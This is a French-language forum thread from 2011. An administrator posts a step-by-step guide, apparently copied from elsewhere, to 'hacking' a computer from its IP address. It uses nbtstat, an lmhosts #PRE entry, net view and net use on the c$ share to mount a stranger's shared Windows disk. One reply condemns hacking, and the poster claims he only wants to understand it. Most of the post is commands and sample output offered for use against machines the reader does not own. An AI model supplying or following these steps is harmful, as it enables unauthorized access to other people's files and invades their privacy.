w3creationweb Index du Forum
S’enregistrerRechercherFAQMembresGroupesConnexion
Cracker une adresse IP

Répondre au sujet    w3creationweb Index du Forum » w3creationweb » Codage html Sujet précédent
Sujet suivant
Cracker une adresse IP
Auteur Message
sorcier21
Administrateur

Masculin Scorpion (23oct-21nov)
Point(s): 114
Moyenne de points: 0,69

Message Cracker une adresse IP Répondre en citant
Comment pirater avec une simple adresse IP 

Il faut pour ça, que dans la configuration réseau de l'ordinateur auquel vous voulez accéder, ai sélectionné "Client pour les réseaux microsoft" et "Partage des fichiers" (Démarrez/panneau de configuration/Réseau).

Ouvrez une fenêtre MS-DOS, tapez ensuite la commande suivante:

nbtstat -A ip de l'ordinateur

Vous allez voir apparaître:

NetBios Remote Machine Name Table 
Name Type status 

result<00> UNIQUE Registered 
ccccc<00> GROUP Registered 
MAC Adress = 48-54-32-12-00-21

Seule la ligne "result<00> UNIQUE Registered" nous intéresse, vous savez maintenant que "result" est le nom de l'ordinateur distant (les noms et les numéros ne sont que des exemples destinés à illustrer la manip).

tapez la commande:

edit lmhosts

vous êtes dans l'éditeur dos, là vous tapez :

ip de l'ordinateur "result" #PRE

Sauvez et quittez l'éditeur, de retour sur Dos tapez :

nbtstat -R

vous obtenez:

Successful purge and preload of the NBT Remote Cache Name Table.

Tapez:

net view *\\result

ressources partagées à \\result

Nom de partage Type Commentaire
------------------------------------------------------ 
C Disque 
Exécution achevée.

Placez vous dans le répertoire Windows (cd windows) et tapez:

net use *\\result\c

M: connecté à \\rsult\c

Vous êtes maintenant sur le disque dur de l'ordinateur distant, vous pouvez, soit continuer sur MS-DOS ou retourner sous Windows, dans ce dernier cas, pour retrouver l'ordinateur distant, faites Démarrer/rechercher/ordinateur et tapez result\\ notez bien le chemin donné. 
Allez ensuite dans l'explorateur et dans le menu Options/connecter un lecteur réseau tapez la chemin d'accès à l'ordinateur. windows vous affectes un lecteur (E par exemple) qui corresponds au disque dur de l'ordinateur distant.

--------------------------------------------------------------------------------

ou !!

1°/ Pour le réaliser il faut ouvrir une fenêtre MS-DOS si vous êtes sous windows; là, tapez la commande suivante qui vous permettra de trouver le nom de l'ordinateur à qui appartient cette adresse ip: 

nbtstat -A ip_de_l'ordinateur_distant

Si vous avez pas compris, je donne un exemple: nbtstat -A 125.35.23.210 

(l'adresse ip a été choisie au hasard et le A doit être en majuscule. Les espaces ont leur importance) 

2°/ Ensuite vous allez voir apparaître différentes lignes de codes. Suivant si vous tombez sur une adresse étant attribuée ou pas, ces lignes diffèrent. Si un message d'erreur s'affiche (host not found), changez d'adresse, si des kyrielles de lignes s'affichent, c'est cool mais c'est pas suffisant. Il faut maintenant que la ligne suivante s'affiche parmi celles qui s'affichent.: 

nom_de_l'ordinateur_distant<XX>UNIQUE Registered

Si vous n'avez toujours pas compris, je vais vous redonner un exemple: assassin<20>UNIQUE Registered 

(assassin est le nom de l'ordinateur distant. <XX>, XX est un nombre qui varie d'un 

ordinateur à l'autre mais le 20 indique que les ressources sont partagées.)

3°/ Bon maintenant que vous avez l'ip et le nom de l'ordinateur distant, vous allez ouvrir et modifier l'éditeur de Dos en tapant la commande suivante: 

edit lmhosts

4°/ Maintenant que vous êtes dans l'éditeur de Dos, vous allez taper les commandes suivantes: 

ip_de_l'ordinateur nom_de_l'ordinateur #PRE

Si là encore vous avez rien pigé, je commence sérieusement à me demander si vous n'êtes pas un peu lamerz sur les 

bords. Mais comme j'ai une incroyable grandeur d'âme (sans modestie aucune), je vais encore une fois vous expliquer 

avec un exemple: 125.35.23.210 assassin #PRE 

(même chose que précédemment et respectez les majuscules à l'endroit où j'en ai mis) 

5°/ Enregistrez et quittez l'éditeur. De retour sur le Dos, tapez la commande suivante: 

nbtstat -R

Vous devriez normalement obtenir: "Successful purge and preload of the NBT Remote Cache Name Table" 

6°/ Tapez maintenant: 

net view \\nom_de_l'ordinateur

C'est à ce moment la que tout se joue, si les ressources de cet ordinateur sont partagées, tu obtiendras un 

inventaire des ressources partagées (c,d,e, ...) sinon il n'y aura rien dans cet inventaire. 

7°/ Place toi dans le répertoire de windows. 

8°/ A présent tapes: 

net use \\nom_de_l'ordinateur\X

Les espaces ont de l'importance et vous remplacerez naturellement "nom_de_l'ordinateur" par "assassin" et le X par 

la lettre de la partition à laquelle vous désirez accéder. Si vous voulez accéder dans le répertoire où se trouve 

windows, tapez c$ à la place du X. 

Voilà, vous êtes sur le disque c de l'ordinateur distant ayant comme nom assassin et comme adresse IP 125.35.23.110, n'y faites pas trop de conneries; souvenez vous, c'est la partie hacking, pas crashing. Si vous avez besoin de revenir sur cet ordinateur à l'avenir, faites une recherche (démarrer, rechercher, ordinateur) et tapez "assassin". 

Si c'est la première fois que vous utilisez cet exploit, il faut créer un fichier lmhosts, pour cela, allez sous dos et tapez: 

Edit puis enter. La vous écrivez: " nouveau, ip_de_l'ordinateur nom_de_l'ordinateur_distant #PRE", vous sauvegarder sous le nom d'lmhosts, puis quittez.

Jeu 27 Oct - 21:49 (2011) Visiter le site web du posteur
Publicité

Message Publicité
PublicitéSupprimer les publicités ?

Jeu 27 Oct - 21:49 (2011)
ga

Point(s): 9
Moyenne de points: 1,00

Si je peux me permettre ... Je trouve le hacking irrespectueux et franchement intolérable  Evil or Very Mad  ...

"Ne fais pas à autrui ce que tu n'aimerais pas que l'on te fasse" 
Le jour ou tu comprend ça , tu comprend la base  fondamentale de la vie ...

Désolé moi je n'adhère pas à ce genre de pratique ...  Rolling Eyes

Ven 28 Oct - 19:17 (2011)
sorcier21
Administrateur

Masculin Scorpion (23oct-21nov)
Point(s): 114
Moyenne de points: 0,69

tout a fait d accord je cherche juste a comprendre mais en aucun cas je n'exploiterais.
bonne soirée

sorcier21

Ven 28 Oct - 22:45 (2011) Visiter le site web du posteur
Contenu Sponsorisé

Message Cracker une adresse IP

Aujourd’hui à 03:26 (2018)
Répondre au sujet    w3creationweb Index du Forum » w3creationweb » Codage html Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 1

Sauter vers: 

Index | Panneau d’administration | Creer un forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation